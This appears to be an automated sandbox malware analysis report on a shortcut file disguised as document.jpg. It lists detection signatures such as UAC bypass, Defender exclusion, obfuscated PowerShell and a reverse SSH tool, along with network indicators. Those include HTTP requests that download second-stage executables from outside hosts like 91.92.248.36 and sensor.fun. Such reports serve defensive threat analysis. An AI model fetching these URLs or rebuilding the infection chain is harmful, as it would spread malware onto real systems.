Windows Analysis Report
document.jpg.lnk

Overview

General Information

Sample name:	document.jpg.lnk
Analysis ID:	1391084
MD5:	aa17c1186359a1ff75f4c53531de4b40
SHA1:	726d59562bf9c5530706337181c995aa7aa7df56
SHA256:	043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952
Tags:	lnk
Infos:

Detection

Reverse SSH

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Outlook Reverse SSH

Adds a directory exclusion to Windows Defender

Found suspicious powershell code related to unpacking or dynamic code loading

Powershell drops PE file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Bypass UAC via Fodhelper.exe

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious MSHTA Child Process

Suspicious execution chain found

Suspicious powershell command line found

Uses an obfuscated file name to hide its real file extension (double extension)

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\tiago.exe

Avira: detection malicious, Label: TR/Redcap.leocq

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tiago.exe

ReversingLabs: Detection: 23%

Source:	Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2021942530.0000013FBBB52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000005.00000003.2907834492.000001F8C0402000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2911131597.000001F8C0416000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2906358695.000001F8C0371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2915546986.000001F8C0419000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2906358695.000001F8C03EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907081622.000001F8C03FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907000170.000001F8C03F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2910712655.000001F8C0407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2919790052.000001F8C041A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907960330.000001F8C0404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2906916181.000001F8C03EF000.00000004.00000020.00020000.00000000.sdmp, config[1].exe.5.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2rShell.Utility.psm1crosoft.PowerShell.Commands.Utility.dllt.dll source: powershell.exe, 00000009.00000002.2404568268.000002BB839A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\rprichard\proj\winpty\src\Release\x64\winpty.pdb source: tiago.exe, 00000033.00000002.3217790576.0000000000DD0000.00000002.00000001.01000000.00000014.sdmp, tiago.exe, 00000033.00000002.3217790576.0000000000E6C000.00000002.00000001.01000000.00000014.sdmp, tiago.exe.9.dr
Source:	Binary string: calc.pdb source: mshta.exe, 00000005.00000003.2907834492.000001F8C0402000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2911131597.000001F8C0416000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2915546986.000001F8C0419000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2906358695.000001F8C03EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907081622.000001F8C03FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907000170.000001F8C03F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2910712655.000001F8C0407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2919790052.000001F8C041A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907960330.000001F8C0404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2906916181.000001F8C03EF000.00000004.00000020.00020000.00000000.sdmp, config[1].exe.5.dr
Source:	Binary string: C:\rprichard\proj\winpty\src\Release\x64\winpty-agent.pdb source: tiago.exe, 00000033.00000000.2377625972.0000000000FCA000.00000002.00000001.01000000.00000014.sdmp, tiago.exe, 00000033.00000000.2377625972.0000000000F18000.00000002.00000001.01000000.00000014.sdmp, tiago.exe.9.dr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.5:49704 -> 91.92.248.36:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /document.jpg HTTP/1.1Host: urler.siteConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tiago.exe HTTP/1.1Host: sensor.funConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: THEZONEBG THEZONEBG

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Downloads/config.exe HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.92.248.36Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.248.36

Source: global traffic	HTTP traffic detected: GET /Downloads/config.exe HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.92.248.36Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /document.jpg HTTP/1.1Host: urler.siteConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tiago.exe HTTP/1.1Host: sensor.funConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: urler.site

Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.9
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.2
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.24
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2002902278.000001EE5936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2002902278.000001EE59431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.3
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/D
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Do
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Dow
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Down
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downl
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downlo
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloa
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Download
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/c
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/co
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/con
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/conf
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/confi
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.e
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.ex
Source: mshta.exe, 00000005.00000002.2917406886.000001F0BD89B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907162331.000001F0BD8F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe
Source: powershell.exe	String found in binary or memory: http://91.92.248.36/Downloads/config.exe$global:?
Source: mshta.exe, 00000005.00000002.2917281391.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2916094280.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe&
Source: mshta.exe, 00000005.00000003.2907320112.000001F0BD89A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2917406886.000001F0BD89B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe&r
Source: mshta.exe, 00000005.00000002.2917755583.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2912251391.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2915981491.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907162331.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe...
Source: mshta.exe, 00000005.00000002.2917755583.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2912251391.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2915981491.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907162331.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe...d
Source: mshta.exe, 00000005.00000002.2917755583.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2912251391.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2915981491.000001F0BD90C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe0
Source: mshta.exe, 00000005.00000002.2917406886.000001F0BD8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907320112.000001F0BD8B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exe5t
Source: mshta.exe, 00000005.00000002.2917214384.000001F0BD840000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2916060842.000001F0BD8FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2917709575.000001F0BD8FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2912251391.000001F0BD8F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907162331.000001F0BD8F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeC:
Source: mshta.exe, 00000005.00000002.2917281391.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2916094280.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeE
Source: mshta.exe, 00000005.00000003.2907320112.000001F0BD89A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2917406886.000001F0BD89B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeFr
Source: mshta.exe, 00000005.00000002.2917149646.000001F0BD820000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeH
Source: mshta.exe, 00000005.00000002.2917281391.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2916094280.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeJ
Source: mshta.exe, 00000005.00000002.2918270849.000001F0BDA10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeLE_STRING7
Source: mshta.exe, 00000005.00000002.2917281391.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2916094280.000001F0BD866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeMB
Source: mshta.exe, 00000005.00000002.2917214384.000001F0BD840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exef
Source: mshta.exe, 00000005.00000003.2913495827.000001F8C0955000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exehttp://91.92.248.36/Downloads/config.exe
Source: mshta.exe, 00000005.00000002.2917214384.000001F0BD840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.92.248.36/Downloads/config.exeq
Source: powershell.exe, 00000012.00000002.2189816681.0000025D724E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000012.00000002.2189816681.0000025D724E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000002.00000002.2022569662.0000013FBBBC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: svchost.exe, 00000006.00000002.3222077994.0000023264200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000002.00000002.2021942530.0000013FBBB68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crlft.com/pki/crl/pMicRooCerAut_201crl0Z
Source: powershell.exe, 00000002.00000002.2021942530.0000013FBBB68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csoft.com/pki/crls/MicRooCerAut_23.crl0Z
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.2021942530.0000013FBBB68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://osoft.com/pki/ceooCerAut_2010-068
Source: powershell.exe, 00000012.00000002.2070802265.0000025D00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2070802265.0000025D01598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2002902278.000001EE58F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2811535315.000002349BD49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406897956.000002BB85451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2070802265.0000025D00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.2070802265.0000025D00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2070802265.0000025D01598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2406897956.000002BB8585D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sensor.fun
Source: powershell.exe, 00000009.00000002.2406897956.000002BB8585D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sensor.fun/tiago.exep
Source: powershell.exe, 00000009.00000002.2406897956.000002BB8567B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://urler.site
Source: powershell.exe, 00000009.00000002.2406897956.000002BB8567B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://urler.site/document.jpg
Source: powershell.exe, 00000012.00000002.2189816681.0000025D72488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwoft.com/pkiops/cWinProPCA2011_20.crt0
Source: powershell.exe, 00000007.00000002.2892973214.00000234B3E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000012.00000002.2189816681.0000025D72488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwft.com/pkiops/crProPCA2011_2011-l0a
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2002902278.000001EE58F0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2002902278.000001EE58F1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2811535315.000002349BCD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2811535315.000002349BD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406897956.000002BB85451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2070802265.0000025D00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.2011226930.0000023263F30000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000002.00000002.2010897376.0000013FA3C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2010897376.0000013FA40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2811535315.000002349C264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 00000005.00000002.2917533960.000001F0BD8D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2907162331.000001F0BD8D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: qmgr.db.6.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7480, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\tiago.exe

Jump to dropped file

Very long command line found

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 3166
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 3166			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

